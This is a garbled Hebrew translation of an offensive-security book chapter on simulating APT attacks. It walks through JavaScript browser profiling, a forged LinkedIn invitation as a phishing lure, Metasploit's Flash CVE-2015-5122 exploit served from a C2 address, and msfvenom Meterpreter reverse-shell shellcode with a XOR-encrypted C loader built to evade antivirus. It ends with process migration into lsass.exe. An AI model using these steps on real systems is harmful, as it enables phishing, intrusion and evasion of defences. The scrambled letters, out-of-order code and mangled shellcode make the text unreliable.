‫אם אתה רוצה להמ שיך ו למ שוך אותו מהר שת ש לך ב שור שים‪ ,‬ה קירות לאיתמו ט טו‪.‬‬
‫הע בריין הגדו ל ה שני הוא ג'אווה‪ .‬ראית מו קדםיותר ש ק ל להר כי ביי שומון ‪ Java‬כדי ל בצע‬
‫הת קפות ספציפיות נגד ה ל קו ח‪ ,‬וזה נהדר אם הוו ק טור הזה עו בד ב ש בי לך‪ .‬עם זאת‪ ,‬כמו‬
‫פ לא ש‪ ,‬גר סאות מ סוימות ח שופות להת קפות שיוציאו את הה ח ל טות ה ל לו מידי היעד‬
‫ברגע שהם מ ב קרים באתר שמ כי ל את הניצו ל ש לך‪.‬‬
‫אין כמע ט נ קודות תורפה ‪ -Java‬ב כמו ;‪ -Flash‬ב עם זאת‪ ,‬זו עדיין ה בעיה ה שנייה‬
‫ב ש כי חותה ביותר שזוהתה באותו ‪ AlienVault SOC,‬כפי שמוצג באיור ‪4.3.‬‬
‫איור ‪ 4.3:‬ברור שזו ר שת גדו לה ש ח סרה א ס טר טגיית ניהו ל פגיעות כו ל לת‬

‫מגו ב שת‪.‬‬
‫באגים ב ש חיתות זי כרון‪ :‬ע שה וא ל תע שה אנו נ סת כ ל ע ל מת קפת דוגמה נגד ‪Flash‬‬

‫ב בוא העת‪ ,‬אך קודם כ ל הערה ע ל זרימת הע בודה‪ .‬באופן אי שי‪ ,‬אני לא אוה ב לה שתמ ש‬
‫באגים ש ל ש חיתות זי כרון בעת ני סיון להי כנ ס למער כות היעד‪ .‬מ ט בען ש ל הפגיעות‬
‫ה ל לו‪,‬י כו לה להיות הר בה אי ודאות והר בה שי כו ל לה שת ב ש‪.‬‬
‫כא שר ממ קדים למ ספר עצום ש ל מ שתמ שים בהת קפת פי שינג‪ ,‬זהי כו ל להיות מ קו ב ל‪,‬‬
‫א ב ל בתר חי ש ספציפי ש ל מוד ל ‪ APT,‬כ ל הת קפה נ כ ש לת תגרום למ טרה להיות מודעת‬
‫יותר ו ח שדניתיותר‪ .‬כתוצאה מ כך‪ ,‬ע ליך לה סיר כמה שיותר אי ודאות‪ ,‬ו ל כן בעת ניצו ל‬
‫פגיעויות כא לה‪ ,‬רצוי שיהיה לך כמה שיותר מידע ע ל מה שה ל קו ח מריץ מרא ש‪ ,‬הן‬
‫מ ב חינת מ ש ט ח הת קפה והן מ ב חינת הגר סאות ה ספציפיות ש ל התו כנה‪ .‬אפ שר לה קים‬
‫שרת אינ טרנ ט ו לתת לו מ סויים‬
‫גר סאות ש ל התו כנה‪ .‬אפ שר לה קים שרת אינ טרנ ט ו לתת לו מידה מ סוימת ש ל‬
‫אינ ט ליגנציה כדי לזהות נ קודות תורפה בדפדפנים ו לנצ ל אותן בזמן אמת בהתאם למה‬
‫שנמצא‪ .‬עם זאת‪ ,‬זה מע שי לעתים ר חו קות בהת קפות בעו לם האמיתי נגד ת שתית‬
‫ארגונית והן נו טות להיות "רוע שות" ) ח שודות ל‪ (SDI-‬ואי טיות )המ טרה ע שויה לעזו ב‬
‫את דף האינ טרנ ט או ל סגור את הדפדפן לפני ב חירת ניצו ל מתאים וניצו ל(‪ .‬ל כן התה ליך‬
‫ש לנו צריך להיראות כך‪:‬‬
‫פרופי ל היעד ‪-‬הו בי ל את ה קור בן ש לך לאתר אינ טרנ ט שיריץ כמה ס קריפ טים‬
‫וידגמן את ה ס בי בה‪.‬‬
‫ניצו ל ב חירה ‪ -‬ק בע מה מתאים למ טרה‪.‬‬

‫התגנ בות ‪ -‬שנה את הניצו ל כדי לה ב טי ח שהוא לאיופע ל ע לידי ‪ IDS‬מ בו ס ס חתימה‬
‫א ב ל עדייןיפע ל‪ .‬הי כו לת לעצ ב את ס בי בת היעד ש לך בצורה קרו בה כ כ ל האפ שר‬
‫ב ס בי בה ויר טוא לית חיונית כאן‪ .‬זו אותה בעיה שתמיד מתמודדת איתה בעת פרי סת‬
‫מ טענים ואופי הערפו ליהיה ת לוי בהת קפה‪.‬‬
‫ניצו ל ‪-‬הע בר את ההת קפה בצורה ס בירה כדי להע ביר אותה לפי קודך ו ל ש לי טתך‪.‬‬
‫בהנ חה שאתה ממ קד למ שתמ ש באמצעות דפדפן אינ טרנ ט‪,‬י שנן כמה אפ שרויות‬
‫ל ק ביעת תו כנה בצד ה ל קו ח‪ .‬האפ שרות ה טו בה ביותר היא ‪JavaScript.‬ה ס קריפ ט‬
‫המהיר והמ לו כ לך ה בא מדגים כיצד למנות תו ספים וגר סאות ש ל דפדפן‪:‬‬
‫י טרפ>‪window.open("", "", "height=400,width=500"); newWin.document.write("<p‬‬

‫= ‪<!-- function showWindow(){ var len = navigator.plugins.length; newWin‬‬
‫>"‪ <html> <head> <script type="text/javascript‬פ לאג‪-‬אין‪i = 0; i < len; i++){/>:‬‬
‫‪p>"); for(var‬‬
‫;)">‪+ navigator.plugins[i].description + "</li‬‬

‫">‪newWin.document.write("<li‬‬
‫}‬
‫)(‪newWin.document.close‬‬
‫>‪<body‬‬
‫>‪</head‬‬
‫>‪> </script‬‬
‫‪} //--‬‬
‫>‪value="Show Plug-In Information" onclick="showWindow()"> </form> </body> </html‬‬

‫"‪<form> <input type="button‬‬
‫ל שי טה זוי שיתרונות ו ח סרונות‪ .‬זה ‪JavaScript‬אז כ כ ל הנראהיור שה לפעו ל‪ ,‬א ב ל‬

‫מצד שני‪ -JavaScript ,‬לאין גי שה למער כת ה ק בצים ש ל ה ל קו ח אז זה ת לוי במה‬
‫שהדפדפן בו חר להגיד לו‪ .‬הפ ל ט מ בו לגן ו בדרך כ ל ל מ כי ל כפי לויות‪ ,‬כפי שמוצג באיור‬
‫‪4.4.‬‬
‫איור ‪ 4.4:‬פ ל ט ס קריפ ט מציג נתוני תו סף‪.‬‬

‫י שנם מאפיינים וער כים א חרים שאתהי כו ל להפי ק באמצעות ‪HTML/JavaScript,‬א ב ל‬
‫אם אתה רוצה ל ל כתיותר לעומ ק‪ ,‬תצ טרך מ שהו חז קיותר שרץ בדפדפן כמו ‪Java.‬זה‬
‫מציג בעיות מ ש לו כפי ש כ בר ראית‪ .‬בנו סף‪ ,‬אם אתהי כו ל להפעי ליי שומונים ש ל ‪Java‬‬
‫במער כתיעד‪ ,‬אתה כ בר נמצא בעמדה חז קה לפרו ס את ה‪ 2C-‬ש לך ל לא התע ס קות‬
‫נו ספת‪ .‬ב כ ל מ קרה‪ JavaScript ,‬מתאים למה שצריך כאן‪.‬‬
‫מתפת ל במ טרה‬
‫לגרום למ טרה ש לך ל ב קר בדף הפרופי ל ש לך הוא עניין ש ל הנד סה ח ברתית וי ש לך‬
‫אפ שרויות ר בות‪ .‬האהו ב ע לי הוא לה שתמ ש בהזמנה מזויפת ש ל ‪ LinkedIn.‬כו לנו‬
‫מ ק ב לים אותם מאנ שים שאנ חנו מ כירים ומאנ שים שאנ חנו לא‪ ,‬אז הםיוצרים הת קפת‬
‫" ק לי ק ו ש כ ח" טו בה‪ .‬הזמנה ש ל ‪ LinkedIn‬בתי בת הדואר הנ כנ ס ש לך נראית כמו איור‬
‫‪4.5.‬‬
‫איור ‪4.5:‬הזמנה ש ל ‪ LinkedIn‬מגיעה כהודעת דוא" ל ‪HTML.‬‬

‫זה נראה תמים מ ספי ק א ב ל אתהי כו ל להפוך את זה למת קפהיעי לה ע לידי הורדת‬
‫ה‪ LMTH-‬ו שינוי כתו בות האתרים בהודעה‪ .‬כך‪ ,‬במ קום ל ל כת ‪ -LinkedIn,‬ל כ ל‬
‫ק לי קיפנה את היעד לדף האינ טרנ ט ש ל הפרופי ל‪ .‬אם תו סיף את שורת ה קוד‬
‫ה באה ל סוף ‪-JavaScript:‬ה‬
‫"‪window.location.href = "https://www.linkedin.com/error_pages/‬‬
‫למ שתמ ש תוצג מיד הודעת שגיאה זמנית ש ל ‪-JavaScript‬ה ‪LinkedIn.‬אינו גנ ב ו לא‬
‫יעמוד ב בדי קה מדו קד קת; עם זאת‪ ,‬אנו מ כ סים את ערפו ל ‪ JavaScript‬לעומ ק בהמ שך‬
‫ה ספר‪.‬‬
‫כ שמ סת כ לים ע ל הפ ל ט מפרופיי לר‪ ,‬אתהי כו ל לראות שה ל קו ח מריץ את גר סת הפ לא ש‬
‫‪ 18.0.0.203.‬בדי קת פר טי ‪ CVE,‬שו ב אתה מג לה שגר סה זו פגיעה לניצו ל‬
‫‪ CVE-2015-5122,‬כפי שמוצג באיור ‪4.6.‬‬
‫איור ‪4.6:‬זהו באג ש ל ביצוע פ קודה מר חו ק עם קוד ניצו ל אמין‬

‫ב ט בע‪.‬‬
‫הניצו ל הזה די מעניין‪ .‬זה התג לה ע לידי ח ברה מתוע בת באי ט ליה ב שם ‪ Hacking Team‬שהתמ חתה‬
‫במ כירת תו כנות ריגו ל למ ש טרים די כויים )עד שממ ש לת אי ט ליה ש ל לה את הרי שיון לייצא תו כנה(‪.‬‬
‫לא חר שה‪Team gnikcaH-‬נפגע בעצמו ע לידי גורמים לאידועים‪ ,‬הר בה מה סודות ש לו ו ח ל ק מ קוד‬
‫הניצו ל ש לו ) כו ל ל זה( הוד לפו לאינ טרנ ט‪ .‬זה שופר ע לידי ה קהי לה ויו בא למ סגרת ‪)Metasploit.‬ראה‬
‫‪https://www.rapid7.com/db/modules/exploit/multi/browser/adobe_flash_hacking_te‬‬
‫זהו כ לי שנ ש ל ב ב‪ 2C-‬ש לנו ב סעיף ה בא‪ .‬לעת עתה‪ ,‬נ שתמ ש בניצו ל עצמאי ש ל ‪ Metasploit‬ע בור‬
‫ה באג ‪ CVE-2015-5122‬כדי ל בצע ביצוע קוד ע ל היעד ו להת קין את סו כן ה‪ 2C-‬ש לנו‪ .‬אם אינך מ כיר‬
‫את ‪ Metasploit,‬ע כ שיו זה זמן טו ב לה כיר‪.‬י ש הר בה מדרי כים באינ טרנ ט וזה כ לי שימו שי מדי ב ש בי ל‬
‫מוד לים ש ל ‪ APT‬כדי להתע לם ממנו‪.‬‬
‫הגדרת ההת קפה הזו היא הפ ש טות עצמה‪:‬‬

‫‪root@37-97-139-116:~# msfconsole‬‬
‫> ‪ msf‬חפ ש ‪5122‬‬
‫מודו לים תואמים‬

‫=================‬
‫ׁ ֵשם‬ ‫תיאור דירוג תאריך גי לוי‬

‫‪-----‬‬ ‫‪-------------- ----- --------------‬‬
‫‪ --- exploit/multi/browser/adobe_flash_opaque_background_uaf 2015-‬שימו ש נהדר ‪ -Adobe Flash‬בא טום ר קע‬

‫לא חר חינם ‪07-06‬‬
‫> ‪msf‬ה שתמ ש > )‪adobe_flash_opaque_background_uaf msf exploit(adobe_flash_opaque_background_uaf‬‬

‫‪ -exploit/multi/browser/‬בהגדר >= ‪ PAYLOAD generic/custom PAYLOAD‬גנרי‪/‬מותאם אי שית >‬
‫)‪> set PAYLOAD c PAYLOAD FILE.exe c PAYLOAD exploit(adobe_flash_opaque_background_uaf‬‬
‫)‪ msf exploit(adobe_flash_opaque_background_uaf.exe‬ס ט ‪SRVPORT 80‬‬
‫‪SRVPORT => 80‬‬

‫> )‪msf exploit(adobe_flash_opaque_background_uaf‬הגדר את ‪URIPATH adobe_demo‬‬
‫עם כמה פ קודות פ שו טות‪ ,‬ההת קפה הזו מו כנה ל טי סה‪ .‬התוצאה ה סופית היא שרת‬
‫אינ טרנ ט ש כא שר היעדי ב קר בו‪,‬ית קוף מיד את הפגיעים‬
‫שרת ש כא שר היעדי ב קר בו‪,‬ית קוף מיד את הגר סה הפגיעה ש ל פ לא ש‪ .‬אם זהיצ לי ח‪,‬‬
‫הואיע לה וי בצע את סו כן ‪C2.‬‬
‫הניצו ל מופע ל באופן ה בא‪:‬‬
‫> )‪msf exploit(adobe_flash_opaque_background_uaf‬הפע ל ]*[ניצו ל ריצה כע בודת ר קע‪> [*] .‬‬
‫)‪ msf exploit(adobe_flash_opaque_background_uaf‬שימו ש ב‪0.0.0.0/adobe_demo [*] IP :LRU-‬‬
‫‪ http://‬מ קומי‪http://c2_server.com/adobe_demo [*] :‬ה שרת הופע ל‪.‬‬
‫כ ל מי שמ ב קר ב כתו בת ה‪http://c2server.com/adobe_demo LRU-‬הו לך להיות‬

‫מות קף ו כ ל מי שמפעי ל גר סה פגיעה ש ל ‪Flash‬י ק ב ל ב בע לות‪.‬‬
‫זהו ניצו ל אמין נ חמד ומ בוא טו ב ל‪Metasploit -‬אם אתה לא מ כיר אותו‪.‬‬
‫הוא גם עמיד בפני אנ טי וירו ס ) כ ל עוד אתה לא קורא לזה ‪FlashExploit‬או מי לת‬
‫מפת ח ברורה א חרת שת סמן אותך(‪ ,‬כפי שמוצג באיור ‪4.7.‬‬
‫איור ‪ 4.7: Metasploit‬עו שה ע בודה מצוינת ב ל ט ש ט ש את הת קפת ‪CVE-2015-5012.‬‬

‫פי קוד ו ב קרה ח ל ק ‪IV: Metasploit‬‬

‫שי לו ב‬
‫לא רציתי שזהיהיה "ר ק עוד ספר ע ל ‪ Metasploit ©".‬עם זאת‪ ,‬המ סגרת שימו שית‬
‫מ כדי פ שו ט להתע לם ממנה‪ ,‬ואם מ שתמ שים בה נ כון‪ ,‬היאי כו לה לפתור ו לייע ל הר בה‬
‫מה בעיות בתר חי ש ש ל מוד ל ‪APT.‬י שנן שתי גר סאות ש ל ‪Metasploit -‬הגר סה‬
‫ה חינמית שמתאימה ל ח לו טין לצר כים ש לנו והגר סה בת ש לום‪Metasploit Pro, ,‬‬
‫שהיא מוצר מ ס חרי ב בע לות ‪Rapid 7.‬אין שום ד בר רע מ ט בעו בגר סה המ ס חרית‪,‬‬
‫אז א ל תה ס ס לתת אותה מער בו לת‪.‬‬
‫הערה‬
‫י שנם מ שא בים ר בים )אפי לו מוגזמים( ל לימוד ‪Metasploit.‬זה לא א חד מהם‪.‬‬
‫ההנ חה היא ה בנה פעי לה ש ל מו שגים‪ ,‬פ קודות ומנצ לים ש ל ‪ Metasploit.‬כאן אתה‬
‫עו ס ק בעי קר בה כנ סת הפונ קציונ ליות והגמי שות ש ל המ סגרת לתוך ה‪ 2C-‬ש לך‪.‬‬
‫י סודות אינ טגרציה ש ל ‪Metasploit‬‬

‫כדי ל ש ל ב את ‪ Metasploit‬ב‪ 2C-‬ש לך‪ ,‬אתה צריך את הד ברים ה באים‪:‬‬
‫מאזין ‪Metasploit‬הפוע ל ע ל ת שתית ה‪ 2C-‬ש לך‪ .‬זה עניין ש ל טעם א ב ל בדוגמה‬
‫הזו אנ חנו הו ל כים עם חי בור הפוך ‪ TCP‬שמאזין ביציאה ‪ 1234‬בממ ש ק ‪localhost‬‬
‫ב ל בד‪.‬‬
‫ל קו ח ‪ Meterpreter‬ח סין ‪ AV‬שתו כ ל לפרו ס דרך חי בור ה‪ HSS-‬ש לך‪.‬‬
‫צור מ טען מ קודד מותאם אי שית שת ק שה עודיותר ות ספ ק כיי שום ‪ C‬ק טן‪.‬‬
‫הי כו לת לנת ב דרך חי בור ה‪ HSS-‬ש לך‪ ,‬כך שתו כ ל לא חד ת ק שורת באמצעות חי בור‬
‫י חיד ו לה בי ס את ני טור זיהוי ה חדירה ש ל תע בורת הר שת‪ .‬באופן אידיא לי‪ ,‬ת שתמ ש‬
‫במנהור חי בור דינמי ש ל ‪ SSH,‬שיאפ שר לך להפעי ל פרו ק סי ‪ SOCKS‬במ ח ש ב היעד‬
‫ש לנו ו לנת ב את כ ל תע בורת ‪Metasploit‬דר כו ב חזרה ל‪ .2C-‬עם זאת‪Metasploit ,‬‬
‫אינו מאפ שר לך לציין הגדרות פרו ק סי בעתיצירת קוד מע טפת‪ ,‬כך שת שתמ ש‬
‫במנהרת ‪SSH‬הפו כה פ שו טה עם מאזין ‪ Metasploit‬עצמו‬
‫מוג ב ל ‪ -localhost‬ל ו לא ח שוף ופתו ח לאינ טרנ ט‪.‬‬
‫תצורת שרת‬
‫תצורת ה שרת היא פ שו ט עניין ש ל הת קנת ‪ Metasploit‬והת לות ש לה‪ .‬אם אתה‬
‫מ שתמ ש בהפצת לינו ק ס המיועדת ל בדי קות חדירה‪ ,‬כ ל זהיהיה במאגר‪ .‬א חרת‪ ,‬הורד‬
‫והת קן אותו באופןידני‪ .‬אתה בה ח ל ט רוצה להת קין ‪ PostgreSQL‬ו לה ב טי ח שזה מ ש ח ק‬
‫טו ב עם ;‪ Metasploit‬עם זאת‪ ,‬כ ל זה מתועד בפירו ט במ קום א חר ואני לא א בז בז כאן‬
‫מ קום עם טריוויא ליות‪.‬‬
‫כו בעים ש חורים‪ /‬כו בעים ל בנים‬

‫‪Metasploit‬הוא כ לי ב שימו ש נר ח ב הן ע לידי בוד קי ע טים והן ע לידי מ טעים ו כזה‬
‫שראה ח שיפה ני כרת לניתו ח תו כנות זדוניות‪ ,‬כך שיצירת מ טען גמי ש ‪AV‬הוא תה ליך‬
‫דו‪ -‬ש ל בי‪ .‬ת חי לה נצ טרך ליצור את קוד המע טפת ה ש טו ח שיד בר ב חזרה ל‪ 2C-‬ש לנו‬
‫)המ טען ש לנו )‪ -Meterpreter‬ב ואז ת טמיע את זה בפורמ ט מ קודד ותזרי ק אותוי שר‬
‫לזי כרון בזמן הריצה‪ .‬כך‪:‬‬
‫‪meterpreter/reverse_tcp lhost=localhost lport=1234 -e x86/shikata_ga_nai -i 3 -fc‬‬
‫‪~# msfvenom -p windows/‬‬
‫לא נ ב חרה פ ל טפורמה‪ ,‬ב חירה ‪ -Msf::Module::Platform::Windows‬ב מהמ טען‬
‫לא נ ב חרה ק שת‪ ,‬ב חירת ‪ Arch: x86‬מהמ טען‬

‫נמצאו ‪ 1‬מ קודדים תואמים‬
‫ני סיון ל קודד מ טען עם ‪3‬אי טרציות ש ל ‪x86/shikata_ga_nai x86/shikata_ga_nai‬הצ לי ח עם גוד ל‬
‫‪357 (iteration=0) x86/shikata_ga_nai‬הצ לי ח עם גוד ל ‪(iteration=1) x86/shikata_ga_editer‬‬
‫‪ 384‬עם גוד ל_‪ 6shieed(86/shikata_ga_editer /ianatak‬עם גוד ל )‪4161‬נ ב חר עם מידה סופית ‪411‬‬
‫גוד ל מ טען‪ 411 :‬בתים לא חתום "‪\x5b\x41\x7b\x8e\x35\x60‬‬

‫‪"\x21\xc0\x3a\xe1\x38\x47\x18\xe3\x5e‬‬
‫"‪" \xf3\xc3\xca\xa7\x02\xf8\x6d\x73\x39\x99\x0b\x6e\xc1\x5b\xaf‬‬
‫"‪"\xb7\x50\x90\x04\xbf\xe5\xe1\xaf\x8d\x81\x38\xd3\x66\xb2\x20‬‬
‫"‪"\x88\x07\x29\x74\xfb\xe7\xcc \x5c\x91\xe8\x76\x93\x0b\xb9\x36‬‬
‫"‪\x1d" "\xb7\x97\x83\x44\xac\xe4\xe5\x63\xb9\xe2\xb0\xc2\x3a\x55\x4f‬‬
‫‪"\xbf\xea\x91\xa3\x68\x47\xea\x6c\x4d\xbe\xa6\xa9\x32\x64‬‬
‫"‪"\xe9\x53\x0b\x9d\x2e \x1f\xe9\x16\xe7\x8b\x56\x26\x44\x04\x56‬‬
‫"‪\x85\x8c\x14" "\x29\x0b\xc4\x8c\x31\x3d\x6a\x0c\x7c\x84\x0b\xb0\xb9\x54\x4a‬‬
‫‪"\x86\x6c\x94\x77\x7f\x04\xc0\x73\xde\xcf\xc1\xcd‬‬
‫"‪"\x61\x31\x42 \x17\x03\x42\x17\x83\x83\x94\xaf\xef\x88\xa7\x8a‬‬
‫"‪char buf[] = "\xdb\xde\xd9\x74\x24\xf4\xb8\x69\x68\x4d\x1a\x5a\x2b\xc9\xb1‬‬
x8d\x23\xa7\x95\xc8\x6d" "\xc2\x20\x1a\x9e\x58\x09";
"\xeb\xa9\xa4\x3c\xfb\x39\xc2\x9d\x4c\
"\ xde\x4d\x7f\xd0\x13\x4a\xd3\x0c\xf3\xc5\xef\x83\xda\x48\xae"
"\x13\x99\x39\x44\xaa\x22\x78\xe8\xa2\x54\x5c\x8f\x66\x6e\x7c"
"\xaa\x50\x74\x80\xad\x0f\x30\ xf5\x4f\x2b\x60\xa0\x0c\x6f\x4c"
x67" "\x49\x4d\x47\x13\x0c\x81\x71\xfe\xf4\x6f\x37\xc6\x70\xd5\x51"
"\x7d\x78\x0d\x94\xd5\x21\xa4\xf3\x32\x95\x60\x3a\xfa\x6b\
"\x24\x42\x41\x26\x76\ x00\x02\xe6\x8f\xae\x01\x4a\x45\x95\xf9"
x48\x42\x83" "\xc2\xf9\xee\xa4\x11\x0b\x36\xef\x7b\xb1\x10\x09\xf2\x5b\x1c"
"\x89\x85\x8d\x2e\x05\x63\xda\x1f\xaf\x40\x89\xa5\
"\xff\x05\x9f\ x19\x71\x8a\xbd\x76\xd8\x24\x0d\x89\xf2\x16\xf3"
"\x50\x59\xe6\xbb\xb1\x18\x42\xfa\x2d\xad\x76\xf4\xe6\x3e\x47"
"\xa1\x5f\x4d\x57\xfa\xd0\x56\x24\xe5\x2f x55\xf9\x2f\xdf\x2c"
"\x25\ x88\x25\x64\xf7\x54\x55\x0a\x35\x55\x2a\x1f\x3a\xb9\x5f"
"\xa2\x2d\x85\x76\x1a\xd3\x72\xc0\x9d\x0d\x13\xad\xb0\x97\x01"
"\xf4\xcc\x33\xfd\xed\xdb\x6f\xac\ xe4\x04\x28\xc2\x32\x54\x47"
"\xf9\x8e\xad\xc2\x97\x82\x1a\x1f\x05\x67\x88\x49\x48\xb7\xfa"
‫ כדי‬x86/shikata_ga_nai ‫שים ל ב שנתנו ל קוד המע טפת ש לו ש אי טרציות ש ל מ קודד‬

‫ ת חי לה‬,‫ ע ל מנת לע בור את הגיו ס‬.‫א ב ל זה כנראה לאי ספי ק‬AV, ‫למנוע זיהוי חתימות‬
‫ עי בוד ש לו עם מפת ח פ שו ט‬XOR ‫נ ט ש ט ש עודיותר את קוד המע טפת ש לנו ע לידי‬
:‫ ה בא ונ קמפ ל אותו‬C-‫ ו לא חר מ כן נ טען את המ חרוזת הזו לתוך קוד ה‬xyz) ‫) במ קרה זה‬
<windows.h> #include <iostream> int main(int argc, char **argv) { char b[] = {/*
((void()())exec)(); } ‫]גוד ל‬cchar ;{/*‫'הו לך ל כאן‬xyz' ‫ ש לך עם מפת ח המע טפת‬dROX-‫ה‬#include
sizeof c, MEM_COMMIT , PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c);
b]; for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} void exec = VirtualAlloc(0,
4.8. ‫ת ק ב ל את מה שמוצג באיור‬Total, suriV-‫ ל‬XOR ‫אם ת ש ל ח את הפונ קציה‬

‫איור ‪ 4.8:‬פונ קציית ‪ XOR‬פ שו טהי כו לה ב ק לות לה בי ס את ט כנו לוגיית האנ טי‪-‬וירו ס‪.‬‬
‫מה אמרתי ע ל ?‪AV‬‬

‫עד ע כ שיו כנראה למדת ש לה סתמך ע ל ‪ AV‬כדי להגן ע ליך מ כ ל ד בר מ ל בד התו כנה‬
‫הזדונית ה כי טריוויא לית זה רעיון רע מאוד‪ .‬ב סי כון ל חזור ע ל עצמי‪ ,‬בתר חי ש ‪ APT‬ש בו‬
‫אתה ממו קד במיו חד ע לידי תו קף בע ל תו שייה ו ס ב לנות‪ AV ,‬גרוע מ ח סר תוע לת‪ ,‬מ כיוון‬
‫שהוא מ ספ ק ת חו שת בי ט חון מזויפת‪.‬‬
‫כא שר אדון ב שימו ש ב‪Metasploit, -‬א שתמ ש גם ב חזית הגרפית ‪ Armitage‬שפות חה‬
‫ע לידי ‪Raphael Mudge.‬ה סי בה ל כך היא פ שו ט שממ ש ק ‪Metasploit CLI‬המ קורי‬
‫אינו מ ספ ק צי לומי מ סך ממ חי שים במיו חד‪.‬‬
‫נו כ ל להו סיף פונ קציה לממ ש ק הגרפי ‪ C2‬ש לנו כדי להפוך את הפרי סה ש ל סו כן‬
‫‪ Metasploit‬לאו טומ טי או פ שו ט להע לות ו להפעי ל אותו באופןידני‪.‬‬
‫ל‪Metasploit -‬י ש פונ קציונ ליות התמדה מ ש לה‪ ,‬א ב ל אנ חנו לא נ שתמ ש בה מ כיוון‬
‫שהיא ת סומן ע לידי ‪ IDS.‬במ קום זאת‪ ,‬נאת ח ל אותו מת שתית ‪ C2‬ש לנו בעת הצורך‪.‬‬
‫ההגדרה ש לנו עם ‪ Metasploit‬מ שו ל ב ופרו ס נראית כעת כמו איור ‪4.9.‬‬
‫איור ‪4.9:‬הפע לת ‪ Meterpreter‬מוע ברת במנהרה ע ל ‪ SSH‬ונראית תמימה לר שת ‪IDS.‬‬
‫סי בו ב‬
‫א חת הפונ קציות ה ח שו בות וה שימו שיות ביותר שמ ביאה ‪ Metasploit‬למ שוואה היא ציר‪.‬‬
‫זה מאפ שר לנו לנת ב הת קפות דרך מ ח ש ב שנפרץ ו לת קוף מ שא בי ר שת א חרים שי ש לה‬
‫ראות א ליהם‪ .‬זוהי ת כונה הניתנת לערום‪ ,‬כ לומר אנוי כו לים לנת ב דרך שר שרת ש ל‬
‫מ כונות אם נצ טרך‪ .‬זה ע שוי להיות ה כר חי כדי לה בי ס סוגים מ סוימים ש ל ב קרת גי שה‬
‫לר שת או שאו לי תרצה ל בצע הת קפות ממ שא ב ר שת בע ל ערך נמוך‪ ,‬כך שאם זוהה ע ל‬
‫ידי ‪-SOC‬ה לא אי בדת את גי שת רא ש ה חוף ש לך‪ .‬באמצעות ‪Armitage‬זהו תה ליך‬
‫ב ל חיצה א חת המוצג בממ ש ק גרפי ח ל ק ל ק‪.‬‬
‫‪ Metasploit‬מיי שמת גם הת קפת תה ליך הגירה שמאפ שרת ) בין היתר( לע קוף ל ח לו טין‬
‫ב קרת גי שה מ בו ס סת תה לי כים‪ .‬זה מ ביא אותנו בצורה מ סודרת ל סעיף ה בא‪.‬‬
‫ההת קפה‬
‫ה ל קו ח סיפ ק ת חנת ע בודה רגי לה ש ל ‪ Windows 7‬עם תמונה‪ ,‬אם כיי כו לנו גם ל ח בר‬
‫את ער כה מ ש לנו לר שת ש להם‪ .‬הצו הרא שון היה להתפ שר ע ל ת חנת הע בודה עצמה ‪-‬‬
‫מה ש למדנו כאןיגיד לנו הר בה ע ל איך ה ח ברה טיפ לה בא ב ט חת מידע באופן כ ל לי‪.‬‬
‫י ש גם פו טנציא ל לר כו ש אי שורי ניהו ל שע שויים להיות שימו שיים במ קומות א חרים‪.‬‬
‫חומת הא ש ש ל הדי ס ק ה ק שי ח נ כ ש ל‬
‫ת חנות הע בודה מריצים לי בה שונה כדי למנוע כתי בה ש ל תה לי כים לא מור שים לדי ס ק‪.‬‬
‫ק ל לע קוף את ה ט כנו לוגיה הזו וזה הד בר הרא שון שאנ חנו צרי כים לע קוף לפני שנו כ ל‬
‫לת קוף את ת חנת הע בודה ברצינות‪.‬‬
‫‪-HDF‬ה לא מונע מאיתנו להריץ קוד; זה ר ק מונע כתי בת די ס ק ע לידי תה לי כים לא‬
‫מור שים‪ .‬ל כן ההת קפה ש לנו תצ טרך לע בור לתה ליך מור שה א חר כדי לע קוף זאת‪.‬‬
‫גי שת כתי בה ל כונן ה ק שי ח ת ק ל הר בהיותר ע ל הת קפות ה ס למה ש ל הר שאות )ראה‬
‫איור ‪4.10).‬‬
‫איור ‪ 4.10:‬פנ ק ס ר שימות אינוי כו ל ל כתו ב ל כונן ‪C.‬זה הימור הוגן לרו ב תו כנות‬
‫שו ל חן הע בודהי ש אותן הג ב לות‪.‬‬
‫הדגמת ‪Metasploit‬‬
‫הדרך המהירה ביותר לה שיג זאת )וא כן להגדיר את מת קפת ת חנת הע בודה( היא‬
‫לה שתמ ש ב‪ Metasploit. -‬ע לידי פרי סת מ טען ‪ Meterpreter‬בזי כרון‪ ,‬אנוי כו לים‬
‫לר שום תה לי כים ו לע בור ביניהם ב ל חיצת ע כ בר‪ .‬בדוגמה זו‪ ,‬נפר ט את התה לי כים‬
‫הפוע לים ע ל המאר ח כדי ל למוד את ‪-PID‬ה)מזהה תה ליך( ש ל תה ליך ה לי בה ש ל‬
‫‪ Windows lsass.exe‬ו ל קפוץ א ליו‪ .‬ראה איורים ‪ 4.11‬ו ‪-4.12.‬‬
‫איור ‪ 4.11: Armitage‬מציג ר שימה ש ל תו ספים וה בע לים ש להם‪.‬‬

‫איור ‪4.12:‬הע ברת תה לי כים היא תה ליך ב ל חיצה א חת‪ .‬כאן ע ברנו א ל ‪lsass.exe.‬‬
‫כא שר המ טען ש לנו פוע ל בתה ליך ‪lsass.exe ,‬אנוי כו לים לה שתמ ש ב‪Metasploit -‬‬
‫כדי ל כתו ב ל כ ל מה שנרצה‪ ,‬כפי שמוצג באיור ‪4.13.‬‬
‫איור ‪ 4.13:‬בדוגמה זו ‪ test.txt‬מוע לה מת חנת הע בודה ש ל התו קף‪.‬‬
‫מת חת למ כ סת המנוע‬
‫אם אתה מעוניין במה ש קורה כאן בפוע ל‪ Metasploit ,‬עו שה את הפעו לות ה באות‪:‬‬
‫ק ב לת ‪-PID‬ה שא ליו המ שתמ ש רוצה לע בור‪ .‬זהו תה ליך היעד‪.‬‬

‫בדי קת האר כי ט ק טורה ש ל תה ליך היעד בין אם הוא ‪ 32‬סי ביות או ‪ 64‬סי ביות‪.‬‬
‫זה ח שו ב ליי שור זי כרון א ב ל ‪Metasploit‬י כו ל לע בור בין תה לי כים ש ל ‪ 32‬סי ביות‬
‫ל‪ 46-‬סי ביות‪.‬‬
‫בוד קים אם לתה ליך המפר טי ש את ‪SeDebugPrivilege.‬זה מ שמ ש כדי ל ק ב ל‬
‫ש לי טה ע ל תה ליך היעד‪.‬‬
‫ק ב לת מ טען מהמ טפ ל שעומד להיות מוזר ק לתה ליך היעד‪ .‬מ ח ש ב את אור כו גם‬
‫כן‪.‬‬
‫קריאה ל‪ API -‬ש ל )(‪ OpenProcess‬כדי ל ק ב ל גי שה לזי כרון הויר טוא לי ש ל תה ליך‬
